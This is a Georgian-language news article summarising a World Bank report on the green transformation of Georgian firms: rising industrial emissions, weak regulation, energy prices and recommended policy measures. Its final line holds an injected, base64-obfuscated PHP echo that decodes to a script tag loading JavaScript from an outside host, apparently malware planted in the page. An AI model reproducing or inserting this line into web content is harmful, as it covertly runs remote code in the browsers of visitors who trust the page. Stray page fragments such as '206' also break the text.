celsiusi
ავერსი საქკაბელი

მსოფლიო ბანკმა გამოაქვეყნა ახალი ანგარიში „ფირმების მწვანე გარდაქმნა საქართველოში“, რომელიც ერთგვარი მოწოდების როლს ასრულებს პოლიტიკის შემმუშავებლების, კომპანიებისა და სხვა დაინტერესებული მხარეებისთვის, რათა ქვეყნის ენერგოეფექტურობის ამაღლება პრიორიტეტად მიიჩნიონ და მასში ინვესტირება განახორციელონ. ანგარიშის თანახმად, ფირმების მწვანე გარდაქმნის დღის წესრიგი და ეკონომიკური ზრდის ხელშეწყობა ერთმანეთთან მჭიდროდაა დაკავშირებული.

ანგარიში მიუთითებს, რომ ბოლო 15 წლის განმავლობაში საქართველოში ემისიები მნიშვნელოვნად გაიზარდა განსაკუთრებით მრეწველობაში, სატრანსპორტო სერვისებში, მშენებლობაში და ვაჭრობაში ჩართული ფირმების მხრიდან. ანგარიში ყურადღებას ამახვილებს, რომ გადაუდებელი ღონისძიებების გარეშე, საქართველოში 2030 წელს სამრეწველო გამონაბოლქვი შეიძლება 90 პროცენტით უფრო მაღალი აღმოჩნდეს 2015 წელს დაფიქსირებულ დონესთან შედარებით.

ბოლოდროინდელი პროგრესის მიუხედავად, ინსტიტუციური და მარეგულირებელი ჩარჩო საქართველოში კვლავ საჭიროებს მნიშვნელოვან გაძლიერებას ევროკავშირის კანონმდებლობასთან და სტანდარტებთან შესაბამისობის მისაღწევად. საქართველოში ამჟამად აღინიშნება ჩამორჩენა საკანონმდებლო ჩარჩოს იმ კონკრეტულ ნაბიჯებში გარდაქმნაში, რაც გაზრდის სტიმულებსა და შესაძლებლობებს ბიზნესინვესტიციებისთვის. ეს დასტურდება მისი დაბალი რეიტინგით რეგიონის მსგავს ქვეყნებთან შედარებით მდგრადი ენერგეტიკის მარეგულირებელი ინდიკატორების შეფასებაში (RISE).

ანგარიში ხაზს უსვამს რამდენიმე ძირითად ელემენტს, რომლებიც მნიშვნელოვანია საქართველოს მწვანე გარდაქმნისთვის:

  • ენერგოეფექტურობის ამაღლებაში და განახლებადი ენერგიის წყაროებში ბიზნესინვესტიციების განსახორციელებლად წამახალისებელი ღონისძიებებისა და შესაძლებლობების გაუმჯობესების საჭიროება. ფირმების 80 პროცენტისთვის ეფექტიანობის ამაღლება სავარაუდოდ ახალ ინვესტიციებს მოითხოვს. თუმცა, ფირმების დანარჩენი 20 პროცენტი არ საჭიროებს ახალ კაპიტალს ეფექტიანობის ასამაღლებლად და მათ აქვთ მთლიანი ემისიების ერთი მესამედით შემცირებაში წვლილის შეტანის პოტენციალი.
  • პროდუქტიულობის, როგორც ენერგოეფექტურობის განმაპირობებელი ფაქტორის მნიშვნელობა ფირმის დონეზე.
  • ინფორმაციისა და ცოდნის გაზიარება გაცილებით ეფექტიანი ფირმების მხრიდან ნაკლებად ეფექტიანი საწარმოებისთვის,, რომლებიც ახლოს მდებარეობენ ან მსგავს სექტორებში ფუნქციონირებენ.
  • ენერგორესურსების ფასები მნიშვნელოვან როლს ასრულებს სტიმულების განსაზღვრაში ქართული ფირმების ეფექტიანობის გასაუმჯობესებლად. შედეგები აჩვენებს, რომ როდესაც ელექტროენერგიის ფასი იზრდება, ფირმები ცდილობენ ენერგომოხმარების შემცირებას. აღსანიშნავია, რომ შედარებით დაბალი მოთხოვნა ელექტროენერგიაზე არ უკავშირდება წარმოებული პროდუქციის შემცირებას და განპირობებულია ენერგოეფექტურობის ამაღლებით. ფირმები არ ამცირებენ გაყიდვებს და არც დასაქმებას მოკლევადიან პერიოდში, მაგრამ ხდებიან გაცილებით ეფექტიანი და გაზრდილი ხარჯების ნაწილს თავიანთ მომხმარებლებს გადასცემენ.
  • ტექნოლოგიის დანერგვა და მწვანე და ზოგადი მართვის ხარისხიანი პრაქტიკა წარმატებული მწვანე გარდაქმნის ძირითადი შემადგენელი კომპონენტებია. ქართულ ფირმებში ორივე მათგანის ნაკლებობა აღინიშნება. საქართველო მწვანე მართვის პრაქტიკის თვალსაზრისით ცხრა შესადარის ქვეყანას შორის ბოლო ადგილზე მყოფ სამ ქვეყანაში შედის (აზერბაიჯანი, ბულგარეთი, ჩეხეთის რესპუბლიკა, უნგრეთი, ჩრდილოეთი მაკედონია, პოლონეთი, სერბეთი და სლოვენია). მწვანე ტექნოლოგიების დანერგვა ძალზე შეზღუდულია, ბევრ ფირმას კვლავ აქვს გენერატორი ელექტროენერგიის გათიშვის გამო, რაც მნიშვნელოვან არაეფექტურობას იწვევს.

მწვანე გარდაქმნის მხარდასაჭერად ანგარიშის რეკომენდაციაა რეფორმების და პროგრამების ყოვლისმომცველი პოლიტიკის პაკეტის მომზადება, მათ შორისაა:

  • საერთო ეკონომიკური ჰორიზონტალური პოლიტიკა, რომელიც ფოკუსირებული იქნება ფასის სიგნალების და რეგულაციების, ქსელის ინფრასტრუქტურის გაუმჯობესებისა და ელექტროენერგიის მიწოდების მომსახურების სანდოობის ამაღლებაზე.
  • ინფორმირება - ფირმების ცნობიერების ამაღლება ენერგოეფექტურობის ზრდის პოტენციური სარგებლისა და ენერგიის ხელმისაწვდომი დაზოგვის შესახებ.
  • შესაძლებლობები - ფირმების დახმარება შესაძლებლობების იდენტიფიცირებაში მართვის, ორგანიზაციის, ტექნოლოგიის და უნარების გასაუმჯობესებლად.
  • ფინანსები - წვდომის გამარტივება ფინანსურ რესურსებთან, რაც საჭიროა ფირმების ტექნოლოგიის განსაახლებლად.
  • შედარებითი ანალიზი და დიაგნოსტიკა - ანგარიში ხაზს უსვამს მიზნობრიობის მნიშვნელობას სათანადო დიაგნოსტიკური და შედარების ინსტრუმენტების გამოყენებით ფირმების კონკრეტული საჭიროებების შესაფასებლად და ფირმების მზადყოფნის ასამაღლებლად ენერგოეფექტურობაში ინვესტირების თვალსაზრისით.
206
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");